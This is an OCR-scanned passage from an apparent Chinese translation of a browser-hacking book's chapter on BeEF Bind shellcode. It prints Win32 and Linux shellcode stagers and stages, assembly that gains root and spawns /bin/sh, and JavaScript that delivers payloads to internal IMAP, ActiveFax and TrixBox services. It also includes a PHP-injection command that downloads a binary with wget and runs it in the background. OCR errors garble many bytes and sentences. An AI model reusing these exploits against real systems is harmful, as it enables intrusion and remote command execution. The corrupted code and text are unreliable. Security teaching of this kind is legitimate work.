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注意 代码 中 加 粗 的 部 分 ， 说 明 调用 了 Windows API 的 createProcessA， 以 执行 包含 在 cma 
参数 中 的 命令 。 

好 了 ,现在 我 们 得 考虑 另 一 个 问题 了 , 那 就 是 如 果 输 出 缓冲 区 太 小 怎么 办 ? 比如 ， 如 果 对 一 
个 包含 几 百 个 文件 的 文件 夹 执行 aiz 命 令 ， 那 预 分 配 的 缓冲 区 很 可 能 存 不 下 那么 多 输出 。 浏 览 器 
不 会 知道 是 不 是 取得 了 所 有 列 出 的 文件 。 为 了 确定 是 不 是 还 有 没 取 到 的 信息 , 浏览 器 还 需要 再 发 
一 次 请 求 。 可 以 是 一 个 没有 cmqa 参 数 的 空 POST 请 求 , 也 可 以 是 一 个 GET 请 求 。 如 果 确 实 还 有 信息 
需要 返回 ,那么 这 些 信息 会 以 这 个 空 请 求 响 应 的 方式 返回 。 这 个 过 程 会 一 直 反 复 ， 直 到 Shellcode 
关闭 HTTP 连 接 ， 也 就 意味 着 命令 的 输出 都 取 完了 。 

3. Linux32 Stager 与 Stage 

Bart Leppens 把 Miller 的 BeEF Bind Shellcode 逻 辑 移植 到 了 Linux。 非 常 感谢 他 的 努力 ， 让 我 们 
也 可 以 使 用 BeEF Bind 攻 击 Linux 服 务 了 。 

这 个 版 本 的 Stager 和 Stage 都 比 Win32 BeEF Bind 的 实现 要 小 。 这 是 因为 Windows 把 函数 保存 为 
DLL， 因 而 Shellcode 需 要 首先 加 载 kernel32。 然 后 再 通过 它 解析 出 Shellcode 中 调用 的 函数 的 原始 
内 存 地 址 。 

除 此 之 外 ，Windows 函 数 的 内 存 地 址 会 因 操作 系统 版 本 和 服务 包 的 级 别 而 不 同 。 因 此 ， 这 部 
分 Shellcode 代 码 也 要 重 写 ， 以 支持 不 同 的 操作 系统 版 本 。 这 些 必要 的 基础 代码 导致 了 Windows 
Shellcode 的 体积 增加 。 

Linux 不 使 用 DLL， 而 使 用 syscalls。 这 意味 着 可 以 省 去 解析 函数 名 称 和 兼容 平台 的 代码 ， 结 
果 Shellcode 的 体积 就 会 更 小 一 些 。 具 体 来 说 ，Stager 只 有 156 字 节 ， 而 Stage 才 606 字 节 。 

以 下 汇编 代码 展示 了 通过 cmd 参 数 传 人 的 命令 的 执行 情况 。 从 中 可 以 看 到 ， 这 里 使 用 了 
setresuid 和 execve 这 两 个 系统 调用 : 

















































































































;setresuid(0,0,0) 

xor eax, eax 

xor ebx, ebx 

xor ecx, ecx 

xor edx, edx 

mov al, Oxa4 ;sys setresuid16 
int 0x80 


;execve("/bin//sh", 0, 0) 
xor eax, eax 

push eax 

push eax 

push 0x68732f2f ;//sh 
push 0x6e69622f ;/bin 

mov ebx, esp 

push BYTE 0x0b ;sys execve 
pop eax 

int 0x80 


这 个 Shellcode 使 用 了 标准 的 Linux 系 统 调用 , 与 Windows 版 使 用 Windows API 类 似 。BeEF Bind 
Linux Shellcode 的 完整 代码 ， 可 以 在 browserhackercom 上 面 找到 。 
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10.6.2 ”在 利用 中 使 用 BeEF Bind 


第 9 章 关 于 远程 命令 执行 小 节 中 讨论 的 所 有 利用 , 都 可 以 修改 为 使 用 BeEF Bind。 接 下 来 我 们 
就 看 几 个 使 用 BeEF Bind 攻 击 Windows 和 Linux 目 标的 例子 。 

1. IMAP 协 议 间 利用 的 例子 

仍 以 前 面 的 利用 IMAP 服 务 为 例 , 这 次 我 们 重新 策划 攻击 , 使 用 BeEF Bind Shellcode。 与 使 用 
其 他 Shellcode 一 样 , 我们 同样 需要 对 Stager 进 行 编码 ,以 防 在 不 同 协议 中 因 问 题字 符 而 导致 问题 。 

协议 与 编程 语言 一 样 ， 对 特定 的 字符 都 会 有 自己 独特 的 意义 。 比 如 ， 有 些 字符 可 能 表示 命令 
的 结尾 、 字 符 串 的 结尾 ， 等 等 。 协 议 不 同 ， 问 题字 符 也 不 同 。 以 IMAP 为 例 ， 无 论 什么 时 候 ， 只 
要 Shellcode 中 出 现 这 些 字符 \x00\x0a\x0d\x20\x7b， 都 必须 对 其 进行 编码 ， 否 则 Shellcode 很 
可 能 出 问题 ， 比 如 发 出 的 命令 可 能 会 被 截 短 、 非 正常 终止 ， 甚 至 直接 被 忽略 。 

有 读者 应 该 还 记得 ， 前 面 例子 中 的 JavaScript 代 码 使 用 了 正常 的 Metasploit Meterpreter 
reverse tcp Shellcode。 现 在 ， 只 要 把 Stager 改 成 BeEF Bind 的 Shellcode 就 行 了 : 


// B33FB33F 正 是 "egg" 

var stager = "B33FB33F" + 
"\xba\x6a\x99\xf8\x25\xd9\xcc\xd9\x74\x24\xf4\x5e\x31\xc9" 
"\xb1\x4b\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\x9f\x65" 
"\x10\xac\x5f£\x96\xel\xcf\xd6\x73\xd0\xdd\x8c\xf0\x41\xd2" 
"\xc7\x55\x6a\x99\x85\x4d\xf9\xef\x01\x61\x4a\x45\x77\x4c" 
"\x4b\x6b\xb7\x02\x8f\xed\x4b\x59\xdc\xcd\x72\x92\x11\x0f" 
"\xb3\xcf\xda\x5d\x6c\x9b\x49\x72\x19\xd9\x51\x73\xcd\x55" 
"\xe9\x0b\x68\xa9\x9e\xal\x73\xfa\x0f\xbd\x3b\xe2\x24\x99" 
"\x9b\x13\xe8\xf9\xe7\x5a\x85\xca\x9c\x5c\x4£\x03\x5d\x6f" 
"\xaf\xc8\x60\x5£\x22\x10\xa5\x58\xdd\x67\xdd\x9a\x60\x70" 
"\x26\xe0\xbe\xf5\xba\x42\x34\xad\xle\x72\x99\x28\xd5\x78" 
"\x56\x3e\xb1\x9c\x69\x93\xca\x99\xe2\x12\x1lc\x28\xb0\x30" 
"\xb8\x70\x62\x58\x99\xdc\xc5\x65\xf9\xb9\xba\xc3\x72\x2b" 
"\xae\x72\xd9\x24\x03\x49\xel\xb4\x0b\xda\x92\x86\x94\x70" 
"\x3c\xab\x5d\x5f\xbb\xcc\x77\x27\x53\x33\x78\x58\x7a\xf0" 
"\x2c\x08\x14\xd1\x4c\xc3\xe4\xde\x98\x44\xb4\x70\x73\x25" 
"\x64\x31\x23\xcd\x6e\xbe\x1lc\xed\x91\x14\x35\xdf£\xb6\xc4" 
"\x52\x22\x48\xfa\xfe\xab\xae\x96\xee\xfd\x79\x0f\xcd\xd9" 
"\xb2\xa8\x2e\x08\xef\x61\xb9\x04\xe6\xb6\xc6\x94\x2d\x95" 
"\x6b\x3c\xa5\x6e\x60\xf£9\xd4\x70\xad\xa9\x81\xe7\x3b\x38" 
"\xe0\x96\x3c\x11\x41\x58\xd3\x9a\xb5\x33\x93\xc9\xe6\xa9" 
"\x13\x86\x50\x8a\x47\xb3\x9f£\x07\xee\xfd\x35\xa8\xa2\x51" 
"\x9e\xc0\x46\x8b\xe8\x4e\xb8\xfe\xbf\x18\x80\x97\xb8\x8b" 
"\xf3\x4d\x47\x15\x6£\x03\x23\x57\x1b\xd8\xed\x4c\x16\x5d" 
"\x37\x96\xX26\x84"; 


JavaScript 代 码 中 的 其 他 部 分 保持 不 变 。 之 后 就 可 以 使 用 IPE 技 术 发 送 第 一 个 POST 请 求 , 然后 
BeEF Bind Stager 就 会 被 加 载 到 IMAP 服 务 的 内 存 并 执行 。 接 着 你 会 发 现 端口 4444/TCP 已 经 在 目标 
主机 上 开始 监听 了 。 第 二 个 必需 的 步骤 是 向 该 监听 端口 发 送 Stage， 使 用 以 下 代码 可 以 做 到 : 


// BeEF Bind Windows 32bit Stage 
var BeEF_Bind_Stage = 
"\xfco\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52"+ 
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"\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff£\x31\xc0\xac\x3c"+ 
"\x61\x7C\xK02\xK2c\K20\xc1l\xcf£\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10"+ 
"\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48"+ 
"\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31"+ 
"\xc0\xac\xcl1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf£8\x3b\x7d\x24"4+ 
"\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3"+ 
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0"+ 
"\x58\x5£\x5a\x8b\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a\x40\x53\x53"+ 
"\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68"+ 
"\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68\x00\x00\x00\x00\x89\xe3\x68"+ 
"\x00\x00\x00\x00\x89\xel\x68\x00\x00\x00\x00\x8d\x7C\x24\x0C\X57\x53 "+ 
"\x51\x68\x3e\xcf\xaf\x0e\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68\x00"+ 
"\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c\x24\x14\x57\x53\x51"+ 
"\x68\x3e\xcf\xaf\x0e\xf£\xd5\x8b\x5c\x24\x08\x68\x00\x00\x00\x00\x68"+ 
"\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1lc\xff£\xd5\x8b\x5c\x24\x04\x68"4+ 
"\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53\x68\xca\x13\xd3\xlc\xff\xd5"+ 
"\x89\x£7\x68\x63\x6d\x64\x00\x89\xe3\xff£\x74\x24\x10\xff£\x74\x24\x14"+ 
"\xff\x74\x24\x0c\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c"+ 
"\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"+ 
"\x56\x56\x53\x56\x68\x79\xcc\x3f£\x86\xff£\xd5\x89\xfe\xb9\xf8\x0f\x00"+ 
"\x00\x8d\x46\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe\x18\x04\x00\x00"+ 
"\xe8\x62\x00\x00\x00\x48\x54\x54\x50\x2£\x31\x2e\x31\x20\x32\x30\x30"+ 
"\x20\x4f£\x4b\x0d\x0a\x43\x6f£\x6e\x74\x65\x6eE\K74\xK2d\x54\x79\x70\x65"4+ 
"\x3a\x20\x74\x65\x78\x74\x2£\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65"+ 
"\*%73\xK73\xK2d\x43\x6£\x6e\x74\x72\x6£\x6c\xK2d\x41\x6c\x6c\x6£\x77\x2d"+ 
"\x4£\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e"+ 
"\x74\x2d\x4c\x65\x6e\x67\x74\xK68\x3a\k20\K33\xk30\K31\xK36\x0d\x0a\x0d"+ 
"\x0a\x5e\xb9\x62\x00\x00\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00\x68"+ 
"\*X77\K73\K32\xK5£\K54\x68\x4cC\xK77\x26\x07\xf£\xd5\xb8\x90\x01\x00\x00"+ 
"\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xf£\xd5\x50\x50\x50\x50\x40\x50"+ 
"\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02\x00\x11"+ 
"\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xf£\xd5\x53\x57\x68"4+ 
"\xb7\xe9\x38\xff£\xf£\xd5\x53\x53\x57\x68\x74\xec\x3b\xel\xff\xd5\x57"+ 
"\x*97\xK68\x75\x6e\x4d\x61\xff£\xd5\x81\xc4\xa0\x01\x00\x00\x5e\x89\x3e"+ 
"\x6a\x00\x68\x00\x04\x00\x00\x89\x£3\x81\xc3\x08\x00\x00\x00\x53\xf£"+ 
"\x*36\x68\x02\xd9\xc8\x5f\xff£\xd5\x8b\x54\x24\x64\xb9\x00\x04\x00\x00"+ 
"\x81\x3b\x63\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb\xf2\x81\xc3\x03"+ 
"\x00\x00\x00\x43\x53\x68\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00\x57"+ 
"\x68\x01\x00\x00\x00\x53\x8b\x5c\x24\x70\x53\x68\x2d\x57\xae\x5b\xff"+ 
"\xd5\x5b\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00\x68\x44\x£0\x35\xe0"+ 
"\xf£\xd5\x31\xc0\x50\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24\x74\x8b"+ 
"\x1lb\x53\x68\x18\xb7\x3c\xb3\xff\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85"4+ 
"\xc0\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14\x04\x00\x00\x57\x68\x86"+ 
"\x0b\x00\x00\x8d\xbe\x7a\x04\x00\x00\x57\x8d\x5c\x24\x70\x8b\x1b\x53 "+ 
"\x68\xad\x9e\x5f£\xbb\xf£\xd5\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18"+ 
"\x04\x00\x00\x57\xf£\x36\x68\xc2\xeb\x38\x5f\xf£\xd5\xf£\x36\x68\xc6"+ 
"\x96\x87\x52\xff£\xd5\xe9\x38\xfe\xff\xff"; 


var uri = "http://172.16.37.151:4444/"; 

xhr = new XMLHttpRequest (); 

xhr.open("POST", uri, true); 
xhr.setRequestHeader("Content-Type", "text/plain"); 
xhr.setRequestHeader('Accept','*/*'); 
xhr.setRequestHeader("Accept-Language", "en"); 
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xhr.sendAsBinary ("cmd=" + BeEF Bind Stage); 











BeEF Bind Stager 和 Stage 都 在 内 存 中 运行 之 后 ， 就 可 以 跨 域 通过 TCP 端 口 4444 与 被 控 系 统 交 
ALY. 前 面 解 释 过 , 与 Shellcode 的 通信 是 双向 的 , 因为 返回 的 每 个 HTTP 响 应 中 都 包含 CORS 首 部 。 
BeEF 中 的 BeEF_bind 命 令 模块 把 很 多 类 似 的 功能 封装 在 一 起 , 从 而 可 以 实现 更 加 自动 化 的 利 














用 。 为 了 演示 起 见 ， 假 设 我 们 已 经 通过 BeEF 绕 过 了 端口 封禁 ， 并 且 俘 获 了 一 个 勾 连 浏 





Wiro B 


下 来 ， 你 在 内 部 网 络 中 发 现 了 一 个 系统 的 143 端 口 是 打开 的 。 现 在 ，BeEF 可 以 帮助 你 以 尽 可 能 自 


动 化 的 方式 利用 该 漏洞 ， 如 图 10-25 和 图 10-26 所 示 。 


Target Host: |172.16.37.151 


Target Port: 143 


BeEF Bind Port: 


/ 
4000 


browserhacker.com 
3000 


BeEF Junk 2000 
Port: 


BeEF Junk imapeudoral 
Socket Name: 





图 10-25 BeEF bind 命 令 模块 的 输入 


Command results 一 | 


1 Wed Aug 14 2013 18:58:14 GMT+0100 (BST) 
data: Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 
Microsoft Corp. C:\WINDOWS\system32> 


Wed Aug 14 2013 18:58:15 GMT+0100 (BST) 
data: netstat -na Active Connections Proto Local Address Foreign 
Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:143 
0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 
127.0.0.1:1028 0.0.0.0:0 LISTENING TCP 127.0.0.1:5152 0.0.0.0:0 
LISTENING TCP 127.0.0.1:5152 127.0.0.1:1088 CLOSE_WAIT TCP 
172.16.37.151:139 0.0.0.0:0 LISTENING TCP 172.16.37.151:143 
172.16.37.1:53558 ESTABLISHED TCP 172.16.37.151:143 
172.16.37.1:53607 CLOSE_WAIT TCP 172.16.37.151:4444 
172.16.37.1:53610 TIME_WAIT TCP 172.16.37.151:4444 
172.16.37.1:53617 TIME_WAIT TCP 172.16.37.151:4444 
172.16.37.1:53618 ESTABLISHED UDP 0.0.0.0:445 *:* UDP 0.0.0.0:500 


*:* UDP 0.0.0.0:4500 *:* UDP 127.0.0.1:123 *:* UDP 127.0.0.1:1900 *:* 
UDP 172.16.37.151:123 *:* UDP 172.16.37.151:137 *:* UDP 
172.16.37.151:138 *:* UDP 172.16.37.151:1900 *:* 
CAWINDOWS!system32» 


图 10-26 ”取得 通过 BeEF Bind 实 现 命令 执行 之 后 的 结 




















从 一 个 原始 网 络 包 的 角度 来 看 , 整个 利用 过 程 中 BeEF Bind 的 通信 都 是 标准 的 HTTP 请 求 和 响 
应 。 图 10-27 展 示 了 在 前 面 讨论 的 利用 IMAP 服 务 的 例子 中 , 把 发 送 BeEF Bind Stager 时 的 原始 流量 





转 储 之 后 得 到 的 结果 。 
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* OK worldmail IMAP4 Server 6.1.19.0 ready 
POST / HTTP/1.1 
Host: 172.16.67.135:143 
User-Agent: Mozilla/5.0 (Macintosh; Ime] Mac OS X 10.7; 
rv:15.0) Gecko/20100101 rirefox/15.0 
Accept: */* 
Accept-Language: en 
Accept-Encoding: gzip, deflate 
aa 


onnection: keep- RES 
once rype: text/pla 
Referer Ittp://172. 16. 67. 1:3000/demos /basic. htm] 
ontent-Length: 410 
origin: http: d Eat 16.67.1:3000 
Em ima: no-cache 
e-control: no-cache 


B33FB33F. j. 
M ERE 
Ue, pie 
和 TCR 

















[10-27 利用 IMAP 服 务 时 发 送 的 BeEF Bind Stager 








BeEF Bind Shellcode 在 内 存 中 运行 后 ,就 可 以 进一步 与 被 控 系 统 交 互 了 。 这 时 候 , 再 发 送 POST 





请 求 ， 在 cm 参数 中 包含 你 要 执行 的 命令 。 图 10-28 展 示 了 在 执行 一 个 命令 


令 时 的 原始 HTTP 请 求 与 


响应 ， 此 时 的 命令 是 netstat -na， 执 行 后 可 以 看 到 该 主机 的 活动 网 络 连接 。 





POST / HTTP/1.1 

Host: 172.16.67.135:4444 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:15.0) 

Firefox/15.0.1 

Accept: text/html, application/xhtmlexml, application/xml; q=0.9, */* 

Accept-Language: en-us,en;g-0.5 

Accept-Encoding: gzip, deflate 

DNT: 1 

Connection: keep-alive 

RAE ELE text/plain; charset=UTF-8 
ttp://172.16.67.1:3000/demos/basic. htm] 

Content-Length: 17 

origin: http: //172.16.67.1:3000 

Pragma: no-cache 

Cache-control: no-cache 


cmd=netstat -na 


Content-Type: text/html 
Access-Control-alflow-origin: * 
Content-Length: 3016 


netstat -na 
Active Connections 

Proto roan Address i State 

TCP 0.0.0.0:25 .0.0.0: LISTENING 


TCP 0.0. s 0:90 moO. Oe LISTENING 
TEP. 0.0.0.0:106 v0.00 LISTENING 


图 10-28 通过 BeEF Bind 在 被 控 系 统 中 执行 命令 


下 面 我 们 简单 总 结 一 下 整个 攻击 流程 。 
(1) 通过 匀 连 浏览 器 发 现 内 部 网 络 中 一 个 存在 漏洞 的 IMAP 服 务 器 。 








(2) 勾 连 浏 览 器 利用 这 个 有 汤 洞 的 服务 发 送 XMLHttpRequest 请 求 ， 以 BeEF Bind Stager 作 为 


此 次 利用 的 payload。 


(3) 这 样 会 在 目标 IMAP 服 务 器 上 监听 TCP 端 口 41444, 准备 好 接收 BeEF Bind 的 第 二 个 payload: 


Stage。 


(4) 匀 连 浏览 需 接 着 向 目标 服务 器 的 4444 端 口 发 送 第 二 个 请 求 , 仍然 使 用 XMLHt tpRequest. 





sendAsBinary， 这 次 发 送 的 是 BeEF Bind Stage, 
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(5) BeEF Bind 可 以 提供 服务 了 ， 它 接收 你 想 在 IMAP 服 务 器 上 执行 的 任意 OS 命令 ， 通 过 标准 
的 POST 请 求 来 帮 你 提交 。 

下 面 我 们 再 看 一 个 利用 ActiveFax 的 例子 ， 同 样 换 成 使 用 BeEF Bind Shellcode。 

2. ActiveFax 协 议 间 利 用 的 例子 

要 使 用 BeEF Bind Shellcode 攻 击 ActiveFax , 必须 修改 前 面 ActiveFax 利 用 示例 中 的 代码 。 同 样 ， 
也 需要 向 Stager 端 口 再 发 送 一 次 请 求 ， 为 此 要 修改 的 代码 如 下 。 注 意 ， 为 了 编码 问题 字符 ， 必 须 
使 用 alpha_mixed 编 码 器 。 


// BeEF 绑 定 阶 段 
var stage = "\xfc\xe8\x89[...snip...]" 


setTimeout (function() { 
xhr.abort (); 
setTimeout (function() { 
// 3X Jud, ikStagerw RZ) NF 
// S*BeEFERA ZR 89444435 v A RK 


var stage request = "cmd-" + stage; 
sendRequest(4444, stage request); 
}, 4000); 
), 2000); 


发 送 Stager 和 Stage 之 后 ， 就 可 以 与 运行 在 被 控 系 统 上 的 BeEF Bind 监 听 器 通信 了 。 图 10-29 展 
示 了 通过 BeEF Bind 执 行 netstat 命 令 的 过 程 。 














(4) & browserhacker.com 








el 
《3 7 Console- HTML CSS Script DOM Net Cookies 


è Clear Persist Profile (CT Errors Warnings info Debuginfo Cookie vs. pox - piap, 1 和 全 
A cm Ea = “netstat " 





= var cmd tetat ~ 

> POST http://172.16,37.151:3000/ Aborted 1.98s debugg..al code (line 45) xhr = now XMLHttpRequest (); 
xhr .onreadyatatechange 

10 i rrea =-= 4) { 

» POST http://172.16.37.151:4444/  2ms debugg_al code (line 45) = 

>>> var uri = "http://172.16.37.151"; var port = 444...nd with Mn only 

xhr.send("cmd=" + cmd + "\r\n"); 

> POST http://172.16.37.151:4444/ 200 OK 1s debugg..al code (line 15) 

undefined 

Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 


C:\Program FilesMActiveFaxNServer»netstat -na 
Active Connections 
Proto Local Address Foreign Address Stote 


TCP 0.0.0.0:21 0.0.0.0:0 LISTENING 
TCP 9.0.0.0:23 0.0.0.0:0 LISTENING 


图 10-29 使 用 BeEF Bind 与 被 控 系 统 交 互 
































为 了 简化 整个 过 程 , 可 以 使 用 BeEF 的 beef bind_shell 命 令 模 块 与 Shellcode 通 信 。 图 10-30 展 示 
了 这 次 攻击 的 过 程 ， 以 及 怎么 在 之 前 IPE 攻 击 的 基础 上 实现 利用 。 从 中 可 以 清楚 地 看 到 勾 连 浏览 
器 所 在 内 部 网 络 中 的 双向 通信 渠道 。 

使 用 BeEF Bind 的 主要 好 处 ， 就 是 可 以 省 去 不 少 用 于 猜测 的 出 站 流量 。 不 需要 预测 出 站 端口 ， 
也 不 需要 使 用 HTTP 或 DNS 隧 道 突破 网 络 。 只 要 利用 已 经 存在 的 浏览 器 通信 渠道 即 可 ， 而 这 最 终 


会 提高 你 的 攻击 成 功率 。 
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E 
反弹 TCP 连 接 处 理 程序 ActiveFax 5.01 
(Metasploit) FAS HE IS ah ` A 
需要 反弹 TCP 连 接 监听 端口 4444 























内 网 中 的 JavaScript Ping 
Sweeping 及 端口 扫描 ， 查 
(CUM F000 BHT 向 BeEF Bind Shellcode 
发 送 命令 
POST / HTTP/I.1 
HOST: target 





My 
^ 
i 
Ny 
t 
r 
W, 
Ny 
t 
My 
i 
LI 
| 


cmd=netstat -na 


上 日、 Stager “Ff 
发 ”利用 
INTERNET 


INTRANET Payis 

















110-30 通过 BeEF Bind Shellcode 实 现 ActiveFax 利 用 的 示意 图 


个 攻击 示例 再 次 突显 了 浏览 器 作为 前 沿 阵地 的 重要 性 。 只 要 勾 连 一 个 浏览 器 , 就 可 以 通过 
它 观 察 inne. 发 现 那些 可 以 访问 到 的 、 等 竺 我们 攻击 的 系统 。 既 然 如 此 ， 有 什么 理由 不 把 浏 
览 器 当成 发 动 攻 击 的 枢纽 呢 ? 
3. TrixBox 协 议 间 利用 的 例子 
第 9 章 我 们 介绍 过 ，TrixBox 的 某 个 版 本 存在 远程 命令 执行 漏洞 。 当 时 我 们 通过 执行 反弹 网 络 
连接 ， 演 示 了 如 何 利 用 该 漏洞 。 
在 此 基础 上 ， 通 过 BeEF Bind 扩 展 攻 击 ， 可 以 演示 色 连 浏览 器 如 何 替 代 反 弹 连 接 ， 从 而 绕 过 
可 能 的 边界 检测 和 预防 性 机 制 。 
TrixBox 运 行 在 CentOS Linux 上， 默认 情况 下 其 iptables 配 置 不 会 屏蔽 任何 进出 的 网 络 流 量 。 
这 一 点 对 BeEF Bind 来 说 非常 合适 。 
以 下 代码 将 被 注入 勾 连 浏览 器 ， 它 会 利用 前 面 讨论 的 TrixBox 的 漏洞 。 这 一 次 注入 的 
结果 是 在 目标 上 运行 BeEF Bind stager 的 二 进 抽 代码 : 


var uri = "http://172.16.37.155/user/index.php"; 









































/* 用 PHP 的 exec 命 令 执行 

* 1. 取得 BeEF Bind 32 位 ELF 

S 7 将 二 进 制 文件 标记 为 可 执行 
.在 后 台 运行 
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* 

var cmd = btoa("/usr/bin/wget -O /tmp/BeEF bind " + 
"http://browserhacker.com/BeEF bind " + 

"&& /bin/chmod «x /tmp/BeEF bind && " + 

"/tmp/BeEF bind > /dev/null 2>&1 & echo $!"); 


// POST 主体 ， 前 面 的 命令 由 base64 解 码 而 来 

// 然后 用 PHP 的 exec 命 令 执行 

var body = "langChoice=<?php exec(base64 decode('" + cmd + "'));?>%00"; 

var xhr = new XMLHttpRequest (); 

xhr.open("POST", uri, true); 

xhr.setRequestHeader("Content-Type", 
"application/x-www-form-urlencoded"); 

xhr.setRequestHeader('Accept','*/*'); 

xhr.setRequestHeader("Accept-Language", "en"); 

xhr.send(body); 

console.log("Sending first request with RCE vector..."); 


function getCookie (name) { 
name += 'z'; 
var parts = document.cookie.split(/;\s*/); 
for (var i = 0; i < parts.length; i++) { 
var part = parts[i]; 
if (part.indexOf (name) == 0) 
return part.substring(name.length) 
j 


return null; 


function trigger()( 

// 当前 会 话 cookie 

var phpsessid = getCookie ("PHPSESSID"); 
console.log("Using PHPSESSID: " + phpsessid); 


// 要 触发 代码 执行 

// 需要 对 S$_SESSION 求 值 

var body = "langChoice=../../../../../../../../../../tmp/sess_" 

+ phpsessid + "$00"; 

var xhr trigger = new XMLHttpRequest (); 

xhr.open("POST", uri, true); 

xhr.setRequestHeader("Content-Type", 
"application/x-www-form-urlencoded"); 

xhr.setRequestHeader('Accept','*/*'); 

xhr.setRequestHeader("Accept-Language", "en"); 

xhr.send(body); 

console.log("Sending second to trigger RCE...\n" + 


"BeEF Bind ELF should now be listening on port 4444."); 
i CN 
3000); 


setTimeout (function() (trigger();), 

这 个 利用 从 http:/browserhackercom 上 下 载 了 BeEF Bind 的 二 进 制 内 容 。 然 后 为 了 执行 而 修改 
了 其 权限 ， 最 终 在 后 台 执行 了 该 二 进 制 内 容 中 的 命令 。 

这 里 的 BeEF Bind 是 一 个 Linux ELF 32 位 的 二 进 制 , 包含 前 面 介 绍 的 BeEF Bind Stager 的 逻辑 。 








470 第 10 章 攻击 网 络 





可 以 使 用 以 下 C 人 代码， 将 该 Stager Shellcode 编译 为 二 进 制 形 式 ， 不 过 也 可 以 从 


https://browserhacker.com_. F 4X: 


#include <stdio.h> 
#include <sys/mman.h> 
#include <string.h> 
#include <stdlib.h> 


# Compile with GCC on Linux as the following 
# gcc -fno-stack-protector -z execstack -o BeEF_bind BeEF_bind.c 


int (*sc) (); 


// BeEF Bind Linux 32-bit Stager 

char shellcode[] = "\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40"+ 
"\x50\x40\x50\x89\xel\x6a\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b"+ 
"\x6a\x04\x54\x6a\x02\x6a\x01\x56\x89\xel\x6a\x66\x58\xcd\x80"+ 
"\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xel\x6a\x10\x51\x56"4+ 
"\x89\xel\x6a\x66\x58\xcd\x80\x43\x43\x53\x56\x89\xel\x6a\x66"+ 
"\x58\xcd\x80\x43\x52\x52\x56\x89\xel\x6a\x66\x58\xcd\x80\x96"+ 
"\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68\xff\xff\xff\xffi"+ 
"\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89\xe3\x6a\x5a"+ 
"\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf£9\x89\xf£3\x6a\x03"+ 
"\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3£\x63\x6d\x64\x3d\x74"+ 
"\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7"; 


int main(int argc, char **argv) { 
char *ptr = mmap(0, sizeof(shellcode), 
PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, 


zs 10977 
if (ptr == MAP FAILED) {perror("mmap") ;exit(-1);} 
memcpy (ptr, shellcode, sizeof(shellcode)); 
sc = (int(*)())ptr; 
(void) ((void(*) ())ptr) (); 


Primer ea" ys 
return 0; 


} 


到 了 这 一 步 ， 应 该 可 以 看 到 BeEF Bind Stager 已 经 在 监听 TCP 端 口 4444 了 ， 如 图 10-31 所 示 。 


LISTEN 
ESTABLISHED 3132/perl 
ESTABLISHED 3071/asterisk 


ee 
|o 





LISTEN 





[810-31 BeEF Bind ELF Stager 运 行 在 端口 4444 上 


这 时 候 , 就 可 以 发 送 要 执行 的 Stage 了 。 可 以 使 用 以 下 JavaScript 代 码 , 就 在 跨 域 的 情况 下 ， 
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因为 BeEF Bind 返 回 的 Access-Control-Allow-Origin 首 部 的 值 是 一 个 通配符 (是 的 ， 这 里 是 可 
靠 的 ): 


// BeEF Bind Linux_32bit Stage 

var BeEF_Bind_Stage = 
"\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58"+ 
"\xcd\x80\x49\x67\xe3\x02\xeb\xf£1\x31\xdb\x6a\x02\x58"+ 
